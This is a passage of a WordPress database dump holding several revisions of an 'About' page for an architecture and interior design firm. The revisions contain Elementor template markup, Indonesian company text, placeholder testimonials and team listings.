href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:59:35','2023-09-22 08:59:35','',38,'https://bauhaus.futuremediatrix.com/?p=4882',0,'revision','',0),(4884,3,'2023-09-22 09:08:21','2023-09-22 09:08:21','','file-1','','inherit','open','closed','','file-1','','','2023-09-22 09:08:21','2023-09-22 09:08:21','',38,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/file-1.jpg',0,'attachment','image/jpeg',0),(4885,3,'2023-09-22 09:08:50','2023-09-22 09:08:50','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Let\'s turn your ideas\ninto reality</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 09:08:50','2023-09-22 09:08:50','',38,'https://bauhaus.futuremediatrix.com/?p=4885',0,'revision','',0),(4886,3,'2023-09-22 09:08:50','2023-09-22 09:08:50','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Let\'s turn your ideas\ninto reality</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 09:08:50','2023-09-22 09:08:50','',38,'https://bauhaus.futuremediatrix.com/?p=4886',0,'revision','',0),(4887,3,'2023-09-22 09:08:50','2023-09-22 09:08:50','<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/file-1.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Let\'s turn your ideas\ninto reality</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Commercial						</h4>\n					0\n				    			        						<h4>\n							Residential						</h4>\n					0\n				    			        						<h4>\n							Office						</h4>','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 09:08:50','2023-09-22 09:08:50','',38,'https://bauhaus.futuremediatrix.com/?p=4887',0,'revision','',0),(4888,3,'2023-09-22 09:10:32','2023-09-22 09:10:32','<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Le\'t turn your ideas into reality</h2>		\n		[mc4wp_form id=\"107\"]		\n					<ul>\n								<li>\n																					<a href=\"tel:021 22544768 \">\n											